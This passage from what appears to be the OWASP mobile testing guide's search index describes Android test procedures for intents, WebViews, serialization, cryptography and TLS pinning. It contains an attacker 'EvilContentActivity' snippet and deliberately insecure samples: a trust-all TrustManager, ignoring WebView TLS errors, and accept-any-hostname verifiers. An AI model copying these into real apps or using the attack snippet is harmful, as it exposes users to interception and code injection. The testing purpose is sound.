public class EvilContentActivity extends Activity{\n @Override\n protected void OnCreate(@Nullable Bundle savedInstanceState){\n super.OnCreate(savedInstanceState);\n setResult(-1, new Intent().setData(Uri.parse(\"content:///data/data/com.attacker/fakelib.so\")));\n finish();\n }\n}\n
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0026/#dynamic-analysis","title":"Dynamic Analysis","text":"A convenient way to dynamically test for implicit intents, especially to identify potentially leaked sensitive data, is to use Frida or frida-trace and hook the startActivityForResult
and onActivityResult
methods and inspect the provided intents and the data they contain.
In order to test for URL loading in WebViews you need to carefully analyze handling page navigation, especially when users might be able to navigate away from a trusted environment. The default and safest behavior on Android is to let the default web browser open any link that the user might click inside the WebView. However, this default logic can be modified by configuring a WebViewClient
which allows navigation requests to be handled by the app itself.
To test if the app is overriding the default page navigation logic by configuring a WebViewClient
you should search for and inspect the following interception callback functions:
shouldOverrideUrlLoading
allows your application to either abort loading WebViews with suspicious content by returning true
or allow the WebView to load the URL by returning false
. Considerations:<script>
tags. Instead, shouldInterceptRequest
should take care of this.shouldInterceptRequest
allows the application to return the data from resource requests. If the return value is null, the WebView will continue to load the resource as usual. Otherwise, the data returned by the shouldInterceptRequest
method is used. Considerations:http(s):
, data:
, file:
, etc.), not only those schemes which send requests over the network.javascript:
or blob:
URLs, or for assets accessed via file:///android_asset/
or file:///android_res/
URLs. In the case of redirects, this is only called for the initial resource URL, not any subsequent redirect URLs.setSafeBrowsingWhitelist
or even ignore the warning via the onSafeBrowsingHit
callback.As you can see there are a lot of points to consider when testing the security of WebViews that have a WebViewClient configured, so be sure to carefully read and understand all of them by checking the WebViewClient
Documentation.
While the default value of EnableSafeBrowsing
is true
, some applications might opt to disable it. To verify that SafeBrowsing is enabled, inspect the AndroidManifest.xml file and make sure that the configuration below is not present:
<manifest>\n <application>\n <meta-data android:name=\"android.webkit.WebView.EnableSafeBrowsing\"\n android:value=\"false\" />\n ...\n </application>\n</manifest>\n
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0027/#dynamic-analysis","title":"Dynamic Analysis","text":"A convenient way to dynamically test deep linking is to use Frida or frida-trace and hook the shouldOverrideUrlLoading
, shouldInterceptRequest
methods while using the app and clicking on links within the WebView. Be sure to also hook other related Uri
methods such as getHost
, getScheme
or getPath
which are typically used to inspect the requests and match known patterns or deny lists.
To test for object persistence being used for storing sensitive information on the device, first identify all instances of object serialization and check if they carry any sensitive data. If yes, check if is properly protected against eavesdropping or unauthorized modification.
There are a few generic remediation steps that you can always take:
For high-risk applications that focus on availability, we recommend that you use Serializable
only when the serialized classes are stable. Second, we recommend not using reflection-based persistence because
See the chapter \"Android Anti-Reversing Defenses\" for more details.
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0034/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0034/#object-serialization","title":"Object Serialization","text":"Search the source code for the following keywords:
import java.io.Serializable
implements Serializable
If you need to counter memory-dumping, make sure that very sensitive information is not stored in the JSON format because you can't guarantee prevention of anti-memory dumping techniques with the standard libraries. You can check for the following keywords in the corresponding libraries:
JSONObject
Search the source code for the following keywords:
import org.json.JSONObject;
import org.json.JSONArray;
GSON
Search the source code for the following keywords:
import com.google.gson
import com.google.gson.annotations
import com.google.gson.reflect
import com.google.gson.stream
new Gson();
@Expose
, @JsonAdapter
, @SerializedName
,@Since
, and @Until
Jackson
Search the source code for the following keywords:
import com.fasterxml.jackson.core
import org.codehaus.jackson
for the older version.When you use an ORM library, make sure that the data is stored in an encrypted database and the class representations are individually encrypted before storing it. See the chapters \"Data Storage on Android\" and \"Android Cryptographic APIs\" for more details. You can check for the following keywords in the corresponding libraries:
OrmLite
Search the source code for the following keywords:
import com.j256.*
import com.j256.dao
import com.j256.db
import com.j256.stmt
import com.j256.table\\
Please make sure that logging is disabled.
SugarORM
Search the source code for the following keywords:
import com.github.satyan
extends SugarRecord<Type>
meta-data
entries with values such as DATABASE
, VERSION
, QUERY_LOG
and DOMAIN_PACKAGE_NAME
.Make sure that QUERY_LOG
is set to false.
GreenDAO
Search the source code for the following keywords:
import org.greenrobot.greendao.annotation.Convert
import org.greenrobot.greendao.annotation.Entity
import org.greenrobot.greendao.annotation.Generated
import org.greenrobot.greendao.annotation.Id
import org.greenrobot.greendao.annotation.Index
import org.greenrobot.greendao.annotation.NotNull
import org.greenrobot.greendao.annotation.*
import org.greenrobot.greendao.database.Database
import org.greenrobot.greendao.query.Query
ActiveAndroid
Search the source code for the following keywords:
ActiveAndroid.initialize(<contextReference>);
import com.activeandroid.Configuration
import com.activeandroid.query.*
Realm
Search the source code for the following keywords:
import io.realm.RealmObject;
import io.realm.annotations.PrimaryKey;
Make sure that appropriate security measures are taken when sensitive information is stored in an Intent via a Bundle that contains a Parcelable. Use explicit Intents and verify proper additional security controls when using application-level IPC (e.g., signature verification, intent-permissions, crypto).
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0034/#dynamic-analysis","title":"Dynamic Analysis","text":"There are several ways to perform dynamic analysis:
To test for enforced updating you need to check if the app has support for in-app updates and validate if it's properly enforced so that the user is not able to continue using the app without updating it first.
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0036/#static-analysis","title":"Static analysis","text":"The code sample below shows the example of an app-update:
//Part 1: check for update\n// Creates instance of the manager.\nAppUpdateManager appUpdateManager = AppUpdateManagerFactory.create(context);\n\n// Returns an intent object that you use to check for an update.\nTask<AppUpdateInfo> appUpdateInfo = appUpdateManager.getAppUpdateInfo();\n\n// Checks that the platform will allow the specified type of update.\nif (appUpdateInfo.updateAvailability() == UpdateAvailability.UPDATE_AVAILABLE\n // For a flexible update, use AppUpdateType.FLEXIBLE\n && appUpdateInfo.isUpdateTypeAllowed(AppUpdateType.IMMEDIATE)) {\n\n\n\n //...Part 2: request update\n appUpdateManager.startUpdateFlowForResult(\n // Pass the intent that is returned by 'getAppUpdateInfo()'.\n appUpdateInfo,\n // Or 'AppUpdateType.FLEXIBLE' for flexible updates.\n AppUpdateType.IMMEDIATE,\n // The current activity making the update request.\n this,\n // Include a request code to later monitor this update request.\n MY_REQUEST_CODE);\n\n\n\n //...Part 3: check if update completed successfully\n @Override\n public void onActivityResult(int requestCode, int resultCode, Intent data) {\n if (myRequestCode == MY_REQUEST_CODE) {\n if (resultCode != RESULT_OK) {\n log(\"Update flow failed! Result code: \" + resultCode);\n // If the update is cancelled or fails,\n // you can request to start the update again in case of forced updates\n }\n }\n }\n\n //..Part 4:\n // Checks that the update is not stalled during 'onResume()'.\n// However, you should execute this check at all entry points into the app.\n@Override\nprotected void onResume() {\n super.onResume();\n\n appUpdateManager\n .getAppUpdateInfo()\n .addOnSuccessListener(\n appUpdateInfo -> {\n ...\n if (appUpdateInfo.updateAvailability()\n == UpdateAvailability.DEVELOPER_TRIGGERED_UPDATE_IN_PROGRESS) {\n // If an in-app update is already running, resume the update.\n manager.startUpdateFlowForResult(\n appUpdateInfo,\n IMMEDIATE,\n this,\n MY_REQUEST_CODE);\n }\n });\n}\n}\n
Source: https://developer.android.com/guide/app-bundle/in-app-updates
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0036/#dynamic-analysis","title":"Dynamic analysis","text":"In order to test for proper updating: try downloading an older version of the application with a security vulnerability, either by a release from the developers or by using a third party app-store. Next, verify whether or not you can continue to use the application without updating it. If an update prompt is given, verify if you can still use the application by canceling the prompt or otherwise circumventing it through normal application usage. This includes validating whether the backend will stop calls to vulnerable backends and/or whether the vulnerable app-version itself is blocked by the backend. Lastly, see if you can play with the version number of a man-in-the-middled app and see how the backend responds to this (and if it is recorded at all for instance).
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0042/","title":"Checking for Weaknesses in Third Party Libraries","text":""},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0042/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0042/#static-analysis","title":"Static Analysis","text":"Detecting vulnerabilities in third party dependencies can be done by means of the OWASP Dependency checker. This is best done by using a gradle plugin, such as dependency-check-gradle
. In order to use the plugin, the following steps need to be applied: Install the plugin from the Maven central repository by adding the following script to your build.gradle:
buildscript {\n repositories {\n mavenCentral()\n }\n dependencies {\n classpath 'org.owasp:dependency-check-gradle:3.2.0'\n }\n}\n\napply plugin: 'org.owasp.dependencycheck'\n
Once gradle has invoked the plugin, you can create a report by running:
gradle assemble\ngradle dependencyCheckAnalyze --info\n
The report will be in build/reports
unless otherwise configured. Use the report in order to analyze the vulnerabilities found. See remediation on what to do given the vulnerabilities found with the libraries.
Please be advised that the plugin requires to download a vulnerability feed. Consult the documentation in case issues arise with the plugin.
Lastly, please note that for hybrid applications, one will have to check the JavaScript dependencies with RetireJS. Similarly for Xamarin, one will have to check the C# dependencies.
When a library is found to contain vulnerabilities, then the following reasoning applies:
When the sources are not available, one can decompile the app and check the JAR files. When Dexguard or ProGuard are applied properly, then version information about the library is often obfuscated and therefore gone. Otherwise you can still find the information very often in the comments of the Java files of given libraries. Tools such as MobSF can help in analyzing the possible libraries packed with the application. If you can retrieve the version of the library, either via comments, or via specific methods used in certain versions, you can look them up for CVEs by hand.
If the application is a high-risk application, you will end up vetting the library manually. In that case, there are specific requirements for native code, which you can find in the chapter \"Testing Code Quality\". Next to that, it is good to vet whether all best practices for software engineering are applied.
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0042/#dynamic-analysis","title":"Dynamic Analysis","text":"The dynamic analysis of this section comprises validating whether the copyrights of the licenses have been adhered to. This often means that the application should have an about
or EULA
section in which the copyright statements are noted as required by the license of the third party library.
There are various items to look for:
Note that there can be Memory leaks in Java/Kotlin code as well. Look for various items, such as: BroadcastReceivers which are not unregistered, static references to Activity
or View
classes, Singleton classes that have references to Context
, Inner Class references, Anonymous Class references, AsyncTask references, Handler references, Threading done wrong, TimerTask references. For more details, please check:
There are various steps to take:
Test the app native libraries to determine if they have the PIE and stack smashing protections enabled.
You can use radare2's rabin2 to get the binary information. We'll use the UnCrackable App for Android Level 4 v1.0 APK as an example.
All native libraries must have canary
and pic
both set to true
.
That's the case for libnative-lib.so
:
rabin2 -I lib/x86_64/libnative-lib.so | grep -E \"canary|pic\"\ncanary true\npic true\n
But not for libtool-checker.so
:
rabin2 -I lib/x86_64/libtool-checker.so | grep -E \"canary|pic\"\ncanary false\npic true\n
In this example, libtool-checker.so
must be recompiled with stack smashing protection support.
Identify all the instances of symmetric key encryption in code and look for any mechanism which loads or provides a symmetric key. You can look for:
DES
, AES
, etc.)KeyGenParameterSpec
, KeyPairGeneratorSpec
, KeyPairGenerator
, KeyGenerator
, KeyProperties
, etc.)java.security.*
, javax.crypto.*
, android.security.*
, android.security.keystore.*
Check also the list of common cryptographic configuration issues.
For each identified instance verify if the used symmetric keys:
For each hardcoded symmetric key, verify that is not used in security-sensitive contexts as the only method of encryption.
As an example we illustrate how to locate the use of a hardcoded encryption key. First disassemble and decompile the app to obtain Java code, e.g. by using jadx.
Now search the files for the usage of the SecretKeySpec
class, e.g. by simply recursively grepping on them or using jadx search function:
grep -r \"SecretKeySpec\"\n
This will return all classes using the SecretKeySpec
class. Now examine those files and trace which variables are used to pass the key material. The figure below shows the result of performing this assessment on a production ready application. We can clearly locate the use of a static encryption key that is hardcoded and initialized in the static byte array Encrypt.keyBytes
.
You can use method tracing on cryptographic methods to determine input / output values such as the keys that are being used. Monitor file system access while cryptographic operations are being performed to assess where key material is written to or read from. For example, monitor the file system by using the API monitor of RMS - Runtime Mobile Security.
"},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0014/","title":"Testing the Configuration of Cryptographic Standard Algorithms","text":""},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0014/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0014/#static-analysis","title":"Static Analysis","text":"Identify all the instances of the cryptographic primitives in code. Identify all custom cryptography implementations. You can look for:
Cipher
, Mac
, MessageDigest
, Signature
Key
, PrivateKey
, PublicKey
, SecretKey
getInstance
, generateKey
KeyStoreException
, CertificateException
, NoSuchAlgorithmException
java.security.*
, javax.crypto.*
, android.security.*
and android.security.keystore.*
packages.Identify that all calls to getInstance use default provider
of security services by not specifying it (it means AndroidOpenSSL aka Conscrypt). Provider
can only be specified in KeyStore
related code (in that situation KeyStore
should be provided as provider
). If other provider
is specified it should be verified according to situation and business case (i.e. Android API version), and provider
should be examined against potential vulnerabilities.
Ensure that the best practices outlined in the \"Cryptography for Mobile Apps\" chapter are followed. Look at insecure and deprecated algorithms and common configuration issues.
"},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0014/#dynamic-analysis","title":"Dynamic Analysis","text":"You can use method tracing on cryptographic methods to determine input / output values such as the keys that are being used. Monitor file system access while cryptographic operations are being performed to assess where key material is written to or read from. For example, monitor the file system by using the API monitor of RMS - Runtime Mobile Security.
"},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0015/","title":"Testing the Purposes of Keys","text":""},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0015/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0015/#static-analysis","title":"Static Analysis","text":"Identify all instances where cryptography is used. You can look for:
Cipher
, Mac
, MessageDigest
, Signature
Key
, PrivateKey
, PublicKey
, SecretKey
getInstance
, generateKey
KeyStoreException
, CertificateException
, NoSuchAlgorithmException
java.security.*
, javax.crypto.*
, android.security.*
, android.security.keystore.*
For each identified instance, identify its purpose and its type. It can be used:
Additionally, you should identify the business logic which uses identified instances of cryptography.
During verification the following checks should be performed:
You can use method tracing on cryptographic methods to determine input / output values such as the keys that are being used. Monitor file system access while cryptographic operations are being performed to assess where key material is written to or read from. For example, monitor the file system by using the API monitor of RMS - Runtime Mobile Security.
"},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0016/","title":"Testing Random Number Generation","text":""},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0016/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0016/#static-analysis","title":"Static Analysis","text":"Identify all the instances of random number generators and look for either custom or well-known insecure classes. For instance, java.util.Random
produces an identical sequence of numbers for each given seed value; consequently, the sequence of numbers is predictable. Instead a well-vetted algorithm should be chosen that is currently considered to be strong by experts in the field, and a well-tested implementations with adequate length seeds should be used.
Identify all instances of SecureRandom
that are not created using the default constructor. Specifying the seed value may reduce randomness. Prefer the no-argument constructor of SecureRandom
that uses the system-specified seed value to generate a 128-byte-long random number.
In general, if a PRNG is not advertised as being cryptographically secure (e.g. java.util.Random
), then it is probably a statistical PRNG and should not be used in security-sensitive contexts. Pseudo-random number generators can produce predictable numbers if the generator is known and the seed can be guessed. A 128-bit seed is a good starting point for producing a \"random enough\" number.
Once an attacker knows what type of weak pseudo-random number generator (PRNG) is used, it can be trivial to write a proof-of-concept to generate the next random value based on previously observed ones, as it was done for Java Random. In case of very weak custom random generators it may be possible to observe the pattern statistically. Although the recommended approach would anyway be to decompile the APK and inspect the algorithm (see Static Analysis).
If you want to test for randomness, you can try to capture a large set of numbers and check with the Burp's sequencer to see how good the quality of the randomness is.
"},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0016/#dynamic-analysis","title":"Dynamic Analysis","text":"You can use method tracing on the mentioned classes and methods to determine input / output values being used.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0019/","title":"Testing Data Encryption on the Network","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0019/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0019/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0019/#testing-network-requests-over-secure-protocols","title":"Testing Network Requests over Secure Protocols","text":"First, you should identify all network requests in the source code and ensure that no plain HTTP URLs are used. Make sure that sensitive information is sent over secure channels by using HttpsURLConnection
or SSLSocket
(for socket-level communication using TLS).
Next, even when using a low-level API which is supposed to make secure connections (such as SSLSocket
), be aware that it has to be securely implemented. For instance, SSLSocket
doesn't verify the hostname. Use getDefaultHostnameVerifier
to verify the hostname. The Android developer documentation includes a code example.
Next, you should ensure that the app is not allowing cleartext HTTP traffic. Since Android 9 (API level 28) cleartext HTTP traffic is blocked by default (thanks to the default Network Security Configuration) but there are multiple ways in which an application can still send it:
android:usesCleartextTraffic
attribute of the <application>
tag in the AndroidManifest.xml file. Note that this flag is ignored in case the Network Security Configuration is configured.cleartextTrafficPermitted
attribute to true on <domain-config>
elements.Socket
) to set up a custom HTTP connection.All of the above cases must be carefully analyzed as a whole. For example, even if the app does not permit cleartext traffic in its Android Manifest or Network Security Configuration, it might actually still be sending HTTP traffic. That could be the case if it's using a low-level API (for which Network Security Configuration is ignored) or a badly configured cross-platform framework.
For more information refer to the article \"Security with HTTPS and SSL\".
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0019/#dynamic-analysis","title":"Dynamic Analysis","text":"Intercept the tested app's incoming and outgoing network traffic and make sure that this traffic is encrypted. You can intercept network traffic in any of the following ways:
Some applications may not work with proxies like Burp and OWASP ZAP because of Certificate Pinning. In such a scenario, please check \"Testing Custom Certificate Stores and Certificate Pinning\".
For more details refer to:
Refer to section \"Verifying the TLS Settings\" in chapter \"Mobile App Network Communication\" for details.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0021/","title":"Testing Endpoint Identify Verification","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0021/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0021/#static-analysis","title":"Static Analysis","text":"Using TLS to transport sensitive information over the network is essential for security. However, encrypting communication between a mobile application and its backend API is not trivial. Developers often decide on simpler but less secure solutions (e.g., those that accept any certificate) to facilitate the development process, and sometimes these weak solutions make it into the production version, potentially exposing users to man-in-the-middle attacks.
Two key issues should be addressed:
Make sure that the hostname and the certificate itself are verified correctly. Examples and common pitfalls are available in the official Android documentation. Search the code for examples of TrustManager
and HostnameVerifier
usage. In the sections below, you can find examples of the kind of insecure usage that you should look for.
Note that from Android 8.0 (API level 26) onward, there is no support for SSLv3 and HttpsURLConnection
will no longer perform a fallback to an insecure TLS/SSL protocol.
Applications targeting Android 7.0 (API level 24) or higher will use a default Network Security Configuration that doesn't trust any user supplied CAs, reducing the possibility of MITM attacks by luring users to install malicious CAs.
Decode the app using apktool and verify that the targetSdkVersion
in apktool.yml is equal to or higher than 24
.
grep targetSdkVersion UnCrackable-Level3/apktool.yml\n targetSdkVersion: '28'\n
However, even if targetSdkVersion >=24
, the developer can disable default protections by using a custom Network Security Configuration defining a custom trust anchor forcing the app to trust user supplied CAs. See \"Analyzing Custom Trust Anchors\".
Search for the Network Security Configuration file and inspect any custom <trust-anchors>
defining <certificates src=\"user\">
(which should be avoided).
You should carefully analyze the precedence of entries:
<domain-config>
entry or in a parent <domain-config>
, the configurations in place will be based on the <base-config>
Take a look at this example of a Network Security Configuration for an app targeting Android 9 (API level 28):
<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<network-security-config>\n <domain-config>\n <domain includeSubdomains=\"false\">owasp.org</domain>\n <trust-anchors>\n <certificates src=\"system\" />\n <certificates src=\"user\" />\n </trust-anchors>\n </domain-config>\n</network-security-config>\n
Some observations:
<base-config>
, meaning that the default configuration for Android 9 (API level 28) or higher will be used for all other connections (only system
CA will be trusted in principle).<domain-config>
overrides the default configuration allowing the app to trust both system
and user
CAs for the indicated <domain>
(owasp.org).includeSubdomains=\"false\"
.Putting all together we can translate the above Network Security Configuration to: \"the app trusts system and user CAs for the owasp.org domain, excluding its subdomains. For any other domains the app will trust the system CAs only\".
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0021/#verifying-the-server-certificate","title":"Verifying the Server Certificate","text":"TrustManager
is a means of verifying conditions necessary for establishing a trusted connection in Android. The following conditions should be checked at this point:
The following code snippet is sometimes used during development and will accept any certificate, overwriting the functions checkClientTrusted
, checkServerTrusted
, and getAcceptedIssuers
. Such implementations should be avoided, and, if they are necessary, they should be clearly separated from production builds to avoid built-in security flaws.
TrustManager[] trustAllCerts = new TrustManager[] {\n new X509TrustManager() {\n @Override\n public X509Certificate[] getAcceptedIssuers() {\n return new java.security.cert.X509Certificate[] {};\n }\n\n @Override\n public void checkClientTrusted(X509Certificate[] chain, String authType)\n throws CertificateException {\n }\n\n @Override\n public void checkServerTrusted(X509Certificate[] chain, String authType)\n throws CertificateException {\n }\n }\n };\n\n// SSLContext context\ncontext.init(null, trustAllCerts, new SecureRandom());\n
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0021/#webview-server-certificate-verification","title":"WebView Server Certificate Verification","text":"Sometimes applications use a WebView to render the website associated with the application. This is true of HTML/JavaScript-based frameworks such as Apache Cordova, which uses an internal WebView for application interaction. When a WebView is used, the mobile browser performs the server certificate validation. Ignoring any TLS error that occurs when the WebView tries to connect to the remote website is a bad practice.
The following code will ignore TLS issues, exactly like the WebViewClient custom implementation provided to the WebView:
WebView myWebView = (WebView) findViewById(R.id.webview);\nmyWebView.setWebViewClient(new WebViewClient(){\n @Override\n public void onReceivedSslError(WebView view, SslErrorHandler handler, SslError error) {\n //Ignore TLS certificate errors and instruct the WebViewClient to load the website\n handler.proceed();\n }\n});\n
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0021/#apache-cordova-certificate-verification","title":"Apache Cordova Certificate Verification","text":"Implementation of the Apache Cordova framework's internal WebView usage will ignore TLS errors in the method onReceivedSslError
if the flag android:debuggable
is enabled in the application manifest. Therefore, make sure that the app is not debuggable. See the test case \"Testing If the App is Debuggable\".
Another security flaw in client-side TLS implementations is the lack of hostname verification. Development environments usually use internal addresses instead of valid domain names, so developers often disable hostname verification (or force an application to allow any hostname) and simply forget to change it when their application goes to production. The following code disables hostname verification:
final static HostnameVerifier NO_VERIFY = new HostnameVerifier() {\n public boolean verify(String hostname, SSLSession session) {\n return true;\n }\n};\n
With a built-in HostnameVerifier
, accepting any hostname is possible:
HostnameVerifier NO_VERIFY = org.apache.http.conn.ssl.SSLSocketFactory\n .ALLOW_ALL_HOSTNAME_VERIFIER;\n
Make sure that your application verifies a hostname before setting a trusted connection.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0021/#dynamic-analysis","title":"Dynamic Analysis","text":"When testing an app targeting Android 7.0 (API level 24) or higher it should be effectively applying the Network Security Configuration and you shouldn't able to see the decrypted HTTPS traffic at first. However, if the app targets API levels below 24, the app will automatically accept the installed user certificates.
To test improper certificate verification launch a MITM attack using an interception proxy such as Burp. Try the following options:
If you're still not able to see any decrypted HTTPS traffic, your application might be implementing certificate pinning.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0022/","title":"Testing Custom Certificate Stores and Certificate Pinning","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0022/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0022/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0022/#network-security-configuration","title":"Network Security Configuration","text":"Inspect the Network Security Configuration looking for any <pin-set>
elements. Check their expiration
date, if any. If expired, certificate pinning will be disabled for the affected domains.
Testing Tip: If a certificate pinning validation check has failed, the following event should be logged in the system logs:
I/X509Util: Failed to validate the certificate chain, error: Pin verification failed\n
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0022/#trustmanager","title":"TrustManager","text":"Implementing certificate pinning involves three main steps:
To analyze the correct implementation of certificate pinning, the HTTP client should load the KeyStore:
InputStream in = resources.openRawResource(certificateRawResource);\nkeyStore = KeyStore.getInstance(\"BKS\");\nkeyStore.load(resourceStream, password);\n
Once the KeyStore has been loaded, we can use the TrustManager that trusts the CAs in our KeyStore:
String tmfAlgorithm = TrustManagerFactory.getDefaultAlgorithm();\nTrustManagerFactory tmf = TrustManagerFactory.getInstance(tmfAlgorithm);\ntmf.init(keyStore);\n// Create an SSLContext that uses the TrustManager\n// SSLContext context = SSLContext.getInstance(\"TLS\");\nsslContext.init(null, tmf.getTrustManagers(), null);\n
The app's implementation may be different, pinning against the certificate's public key only, the whole certificate, or a whole certificate chain.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0022/#network-libraries-and-webviews","title":"Network Libraries and WebViews","text":"Applications that use third-party networking libraries may utilize the libraries' certificate pinning functionality. For example, okhttp can be set up with the CertificatePinner
as follows:
OkHttpClient client = new OkHttpClient.Builder()\n .certificatePinner(new CertificatePinner.Builder()\n .add(\"example.com\", \"sha256/UwQAapahrjCOjYI3oLUx5AQxPBR02Jz6/E2pt0IeLXA=\")\n .build())\n .build();\n
Applications that use a WebView component may utilize the WebViewClient's event handler for some kind of \"certificate pinning\" of each request before the target resource is loaded. The following code shows an example verification:
WebView myWebView = (WebView) findViewById(R.id.webview);\nmyWebView.setWebViewClient(new WebViewClient(){\n private String expectedIssuerDN = \"CN=Let's Encrypt Authority X3,O=Let's Encrypt,C=US;\";\n\n @Override\n public void onLoadResource(WebView view, String url) {\n //From Android API documentation about \"WebView.getCertificate()\":\n //Gets the SSL certificate for the main top-level page\n //or null if there is no certificate (the site is not secure).\n //\n //Available information on SslCertificate class are \"Issuer DN\", \"Subject DN\" and validity date helpers\n SslCertificate serverCert = view.getCertificate();\n if(serverCert != null){\n //apply either certificate or public key pinning comparison here\n //Throw exception to cancel resource loading...\n }\n }\n }\n});\n
Alternatively, it is better to use an OkHttpClient with configured pins and let it act as a proxy overriding shouldInterceptRequest
of the WebViewClient
.
Applications developed in Xamarin will typically use ServicePointManager
to implement pinning.
Normally a function is created to check the certificate(s) and return the boolean value to the method ServerCertificateValidationCallback
:
[Activity(Label = \"XamarinPinning\", MainLauncher = true)]\n public class MainActivity : Activity\n {\n // SupportedPublicKey - Hexadecimal value of the public key.\n // Use GetPublicKeyString() method to determine the public key of the certificate we want to pin. Uncomment the debug code in the ValidateServerCertificate function a first time to determine the value to pin.\n private const string SupportedPublicKey = \"3082010A02820101009CD30CF05AE52E47B7725D3783B...\"; // Shortened for readability\n\n private static bool ValidateServerCertificate(\n object sender,\n X509Certificate certificate,\n X509Chain chain,\n SslPolicyErrors sslPolicyErrors\n )\n {\n //Log.Debug(\"Xamarin Pinning\",chain.ChainElements[X].Certificate.GetPublicKeyString());\n //return true;\n return SupportedPublicKey == chain.ChainElements[1].Certificate.GetPublicKeyString();\n }\n\n protected override void OnCreate(Bundle savedInstanceState)\n {\n System.Net.ServicePointManager.ServerCertificateValidationCallback += ValidateServerCertificate;\n base.OnCreate(savedInstanceState);\n SetContentView(Resource.Layout.Main);\n TesteAsync(\"https://security.claudio.pt\");\n\n }\n
In this particular example we are pinning the intermediate CA of the certificate chain. The output of the HTTP response will be available in the system logs.
Sample Xamarin app with the previous example can be obtained on the MASTG repository
After decompressing the APK file, use a .NET decompiler like dotPeak, ILSpy or dnSpy to decompile the app dlls stored inside the 'Assemblies' folder and confirm the usage of the ServicePointManager.
Learn more:
Hybrid applications based on Cordova do not support Certificate Pinning natively, so plugins are used to achieve this. The most common one is PhoneGap SSL Certificate Checker. The check
method is used to confirm the fingerprint and callbacks will determine the next steps.
// Endpoint to verify against certificate pinning.\n var server = \"https://www.owasp.org\";\n // SHA256 Fingerprint (Can be obtained via \"openssl s_client -connect hostname:443 | openssl x509 -noout -fingerprint -sha256\"\n var fingerprint = \"D8 EF 3C DF 7E F6 44 BA 04 EC D5 97 14 BB 00 4A 7A F5 26 63 53 87 4E 76 67 77 F0 F4 CC ED 67 B9\";\n\n window.plugins.sslCertificateChecker.check(\n successCallback,\n errorCallback,\n server,\n fingerprint);\n\n function successCallback(message) {\n alert(message);\n // Message is always: CONNECTION_SECURE.\n // Now do something with the trusted server.\n }\n\n function errorCallback(message) {\n alert(message);\n if (message === \"CONNECTION_NOT_SECURE\") {\n // There is likely a man in the middle attack going on, be careful!\n } else if (message.indexOf(\"CONNECTION_FAILED\") >- 1) {\n // There was no connection (yet). Internet may be down. Try again (a few times) after a little timeout.\n }\n }\n
After decompressing the APK file, Cordova/Phonegap files will be located in the /assets/www folder. The 'plugins' folder will give you the visibility of the plugins used. We will need to search for this methods in the JavaScript code of the application to confirm its usage.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0022/#dynamic-analysis","title":"Dynamic Analysis","text":"Follow the instructions from \"Testing Endpoint Identify Verification > Dynamic Analysis\". If doing so doesn't lead to traffic being proxied, it may mean that certificate pinning is actually implemented and all security measures are in place. Does the same happen for all domains?
As a quick smoke test, you can try to bypass certificate pinning using objection as described in \"Bypassing Certificate Pinning\". Pinning related APIs being hooked by objection should appear in objection's output.
However, keep in mind that:
In both cases, the app or some of its components might implement custom pinning in a way that is supported by objection. Please check the static analysis section for specific pinning indicators and more in-depth testing.
